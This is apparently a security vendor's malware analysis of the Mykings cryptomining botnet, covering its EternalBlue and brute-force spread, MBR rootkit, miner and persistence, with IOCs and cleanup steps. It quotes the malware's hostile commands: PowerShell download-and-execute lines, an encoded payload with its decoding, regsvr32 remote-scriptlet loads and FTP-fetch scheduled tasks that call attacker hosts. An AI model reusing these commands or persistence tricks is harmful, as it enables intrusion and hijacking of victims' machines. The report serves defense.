Mykings mining botnet updates infrastructure, new wallet gains exceed 600,000

background

Tencent Security Yujian Threat Intelligence Center recently detected that the Mykings mining botnet updated its infrastructure. The virus enabled a new domain name, and the mining income using a new wallet has exceeded 600,000 RMB, and it is still mining at a rate of about 10 XMR per day.

Mykings enters the system through methods such as blasting port 1433 and attacking the EternalBlue vulnerability, and then implants Trojans such as RAT and Miner to form a huge botnet.

The updated version of Mykings mining botnet has the following features:

1. It exploits the EternalBlue vulnerability and 1433 port blasting to launch attacks, and contains the infection code of the Mirai botnet.

2. Infect MBR (the infection process is the same as Dark Cloud virus), use Rookit to fight against antivirus software and download Payload.

3. Remove competing mining Trojans and close ports to block other virus intrusion channels.

4. Persistence is achieved by installing multiple scheduled task backdoors and WMI backdoors.

Mykings Mining Botnet

Detailed analysis

The infected device executes Powershell commands through the WMI backdoor

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http://74.222.14.94/blue.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;

Then get the download addresses of the three Trojans from blue.txt, download and execute them one by one:

The above three Trojans are analyzed as follows:

• ok.exe

The function of ok.exe is to infect MBR, thereby achieving self-protection, anti-virus software resistance, and the function of downloading payloads over the Internet.

The infection process is similar to the Dark Cloud series of viruses discovered by Tencent Yujian Threat Intelligence Center (see https://s.tencent.com/research/report/622.html). The MBR Trojan HOOKs ZwCreateSection in the last stage, maps the rootkit to the kernel space and executes it after getting the execution opportunity, and finally jumps to ZwCreateSection to continue execution.

The main functions of the rootkit are self-protection, terminating the antivirus process, and injecting the system process winlogon.exe to download the payload online to execute the next stage of malicious behavior.

Rootkit obtains the IP address used to update the Trojan: http[:]//www.upme0611.info/address.txt

Get the next stage Payload code configuration file http[:]//mbr.kill0604.ru/cloud.txt, get the download address of the mining module upsupx.exe from the configuration file, and then download and execute the file.

• upsupx.exe

upsupx.exe is downloaded and saved to C:\Windows\Temp\conhost.exe for execution. Download the decryption and mining related configuration files to C:\Program Files\Common Files\xpdown.dat. The configuration file content is as follows:

45.58.135.106

74.222.14.61

139.5.177.10

ok.xmr6b.ru

Get the competitor or old version of the mining Trojan to be removed, including the file name, path, and whether to remove it.

Then read the registry location (HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0)

Detect the CPU type and frequency, and determine which type of mining program to use based on the CPU type and frequency.

Download the open source mining program XMRig, the address is http[:]//198.148.90.34/64work.rar, the program version is 2.14.1, the mining program startup path is C:\Windows\inf\lsmm.exe

After startup, obtain the mining configuration file from the resource file and get the mining pool address: pool.minexmr.com:5555

Wallet: 455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

According to the wallet query income: 1077 XMR has been mined

The current market price is equivalent to RMB 600,000

• u.exe

u.exe uses the attack module C:\Windows\system\msinfo.exe to scan and attack the IP segments of intranet and extranet machines. The methods include exploiting the EternalBlue vulnerability, SQL blasting, Telnet blasting, RDP blasting, etc. Some attack payloads also contain related codes for infecting the mirai botnet.

Scan ports 445/1433 etc.

EternalBlue Vulnerability Attack

SQL brute force attack

Execute Shellcode after blasting login

Telnet brute force attack

RDP brute force attack

Persistence

The Myings mining botnet uses the following methods to maintain persistence:

1. Delete the login account set by other viruses

Use net user to delete accounts mm123$, admin, and sysadm05; use the attrib command to set files in the Temp directory to hidden attributes; use taskkill to kill other mining processes, delete other mining process files, and remote desktop program files; use cacls to set the visibility of some directories and files.

Use the wmic command to delete the mining program disguised as a system process. The judgment basis is that the file is the system process name, but it is not in the system directory.

2. Set the properties of related files and paths to hidden

3. Turn off system self-update

Delete the following scheduled tasks and turn off system self-update:

SCHTASKS /Delete /TN "WindowsUpdate1" /F &SCHTASKS /Delete /TN "WindowsUpdate3" /F &SCHTASKS /Delete /TN "Windows_Update" /F &SCHTASKS /Delete /TN "Update" /F &SCHTASKS /Delete /TN "Update2" /F &SCHTASKS /Delete /TN "Update4" /F &SCHTASKS /Delete /TN "Update3" /F &SCHTASKS /Delete /TN "windowsinit" /F &SCHTASKS /Delete /TN "System Security Check" /F &SCHTASKS /Delete /TN "AdobeFlashPlayer" /F &SCHTASKS /Delete /TN "updat_windows" /F &SCHTASKS /Delete /TN "at1" /F &SCHTASKS /Delete /TN "at2" /F &SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F &SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f &SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /F

4. Block connections to ports 139/445 etc.

Network firewall settings, set the connection request of port 65536 to allow, and set the connection of port 135/137/138/139/445 to deny.

5. Add registry startup items

Add the Run startup item to the registry:

6. Add a large number of scheduled task backdoors

Add 5 scheduled tasks:

Mission 1: Mysa

Execute: cmd /c echo openftp.0603bye.info>s&echo test>>s&echo 1433>>s&echobinary>>s&echo get a.exe c:\windows\update.exe>>s&echobye>>s&ftp -s:s&c:\windows\update.exe

Mission 2: Mysa1

Execute: rundll32.exe C:\windows\debug\item.dat,ServiceMain aaaa

Mission 3: Mysa2

Execute: cmd /c echo open ftp.0603bye.info>p&echotest>>p&echo 1433>>p&echo get s.datc:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

Mission 4: Mysa3

Execute: /c echo openftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echoget s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp-s:ps&c:\windows\help\lsmosee.exe

Task 5: OK

Execute: cmd c:\windows\debug\ok.dat,ServiceMainaaaa

The backdoor functions of each planned task are summarized as follows:

7. Add a WMI backdoor to execute a large number of commands

Add backdoor by creating WMI event filters and consumers.

Delete the old event filters and consumers:

fuckyoumm2_filter fuckyoumm2_consumer Windows Events Filter Windows Events Consumer4 Windows Events Consumer fuckayoumm3 fuckayoumm4

Create a new event filter and consumer:

fuckyoumm3

fuckyoumm4

The code executed by the WMI backdoor is:

(1) powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8Ad wBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAn ACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvAC cAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="

(After decoding:

$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http[:]//wmi.1217bye.host/2.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;} )

(2) powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//wmi.1217bye.host/S.ps1')

(3) powershell.exe IEX

(New-Object system.Net.WebClient).DownloadString('http[:]//173.208.139.170/s.txt')

(4) powershell.exe IEX

(New-Objectsystem.Net.WebClient).DownloadString('http[:]//139.5.177.19/s.jpg')||regsvr32/u /s /i:http[:]//wmi.1217bye.host/1.txt scrobj.dll

(5) regsvr32 /u /s/i:http[:]//173.208.139.170/2.txt scrobj.dll

(6) regsvr32 /u /s/i:http[:]//139.5.177.19/3.txt scrobj.dll

The command functions executed by the WMI backdoor are summarized as follows:

Safety Tips

1. MS010-17 “Eternal Blue” vulnerability

The server temporarily closes unnecessary ports (such as 135, 139, 445). For more information, please refer to: https://guanjia.qq.com/web_clinic/s8/585.html

Download and update Windows system patches to promptly fix the EternalBlue series of vulnerabilities

XP, Windows Server 2003, Win 8 and other systems: http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7, win8.1, WindowsServer 2008, Windows10, WindowsServer2016 and other systems: https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

2. Use strong passwords on the server and avoid using weak passwords to prevent hackers from cracking them with brute force.

3. Use anti-virus software to intercept possible virus attacks;

4. In addition to using Tencent Yudian to detect and kill the Mykings virus, users who are infected with the Mykings virus can also manually clean it up by following the steps below:

1) Delete files

C:\Windows\System32\ok.exe

C:\WINDOWS\system32\max.exe

C:\Windows\SysWOW64\drivers\64.exe

C:\WINDOWS\system\downs.exe

C:\WINDOWS\Temp\conhost.exe

C:\windows\system32\upsupx.exe

C:\Windows\inf\lsmm.exe

C:\WINDOWS\inf\msief.exe

C:\windows\system32\s.exe

C:\WINDOWS\system\msinfo.exe

C:\Windows\Help\lsmosee.exe

C:\windows\debug\lsmosee.exe

C:\windows\debug\item.dat

2) Delete the registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\start

HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start

3) Delete scheduled tasks

Mysa

Mysa1

Mysa2

Mysa3

OK

4) Delete WMI event filters and consumers

fuckyoumm2_filter fuckyoumm2_consumer Windows Events Filter Windows Events Consumer4 Windows Events Consumer fuckayoumm3 fuckayoumm4

fuckyoumm3

fuckyoumm4

IOCs

MD5

9F86AFAE88B2D807A71F442891DFE3D4

147BA798E448EB3CAA7E477E7FB3A959

B89B37A90D0A080C34BBBA0D53BD66DF

1A5EC4861CC11742D308145C32A3842A

5835094B232F999C20FE2B76E9673455

49CC3130496079EBFEA58A069AA4B97A

E5F19CBFBBABA501D4D9A90856FF17D3

A1B9F55BF93E82550B4C21CD3230C3C3

1F0EC5A4B101837EA7CD08FCB3247B2B

FA066F84F3D657DFB9ADF8E0F92F03E7

A1B9F55BF93E82550B4C21CD3230C3C3

IP

139.5.177.10

74.222.14.94

208.110.71.194

80.85.152.247

66.117.2.182

70.39.124.70

150.107.76.227

103.213.246.23

45.58.135.106

103.95.28.54

74.222.14.61

198.148.90.34

185.22.172.13

223.25.247.240

192.187.111.66

66.117.6.174

173.208.139.170

139.5.177.19

173.247.239.186

79.124.78.127

78.142.29.152

74.222.14.61

54.255.141.50

Domain

www.upme0611.info

mbr.kill0604.ru

ok.xmr6b.ru

js.0603bye.info

pc.pc0416.xyz

down2.b5w91.com

wmi.1217bye.host

down.mys2018.xyz

URL

http[:]//74.222.14.94/blue.txt

http[:]//js.0603bye.info:280/v.sct

http[:]//173.247.239.186/ok.exe http[:]//139.5.177.10/upsupx.exe http[:]//139.5.177.10/u.exe

http[:]//185.22.172.13/upsupx.exe

http[:]//www.upme0611.info/address.txt

http[:]//103.213.246.23/address.txt

http[:]//208.110.71.194/cloud.txt

http[:]//mbr.kill0604.ru/cloud.txt

http[:]//mbr.kill0604.ru/TestMsg64.tmp

http[:]//mbr.kill0604.ru/TestMsg.tmp

http[:]//45.58.135.106/kill.txt

http[:]//45.58.135.106/md5.txt

http[:]//45.58.135.106/xpxmr.dat

http[:]//198.148.90.34/64.rar

http[:]//45.58.135.106/vers1.txt

http[:]//208.110.71.194/cloud.txt

http[:]//185.22.172.13/upsupx.exe

http[:]//ok.xmr6b.ru/xpdown.dat

http[:]//ok.xmr6b.ru/ok/vers.html

http[:]//ok.xmr6b.ru/ok/down.html

http[:]//198.148.90.34/64work.rar

http[:]//198.148.90.34/upsupx.exe

http[:]//198.148.90.34/b.exe

http[:]//198.148.90.34/b2.exe

http[:]//198.148.90.34:808/b2.exe

http[:]//198.148.90.34/cudart32_65.dll

http[:]//198.148.90.34/0228.rar

http[:]//223.25.247.240/ok/ups.html

http[:]//173.208.139.170/up.txt

https[:]//173.208.139.170/s.txt

http[:]//173.208.139.170/2.txt

http[:]//wmi.1217bye.host/2.txt

http[:]//wmi.1217bye.host/S.ps1

http[:]//173.208.139.170/s.txt

http[:]//139.5.177.19/s.jpg

http[:]//wmi.1217bye.host/1.txt

http[:]//173.208.139.170/2.txt

http[:]//139.5.177.19/3.txt

http[:]//173.247.239.186/max.exe

http[:]//173.247.239.186/ups.exe

http[:]//173.247.239.186/upsupx.exe

http[:]//139.5.177.19/l.txt

http[:]//79.124.78.127/up.txt

Wallet : 455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2

Reference Links

https://www.freebuf.com/articles/web/146393.html

https://s.tencent.com/research/report/622.html

https://www.freebuf.com/column/187489.html

Source: Tencent Yujian Threat Intelligence Center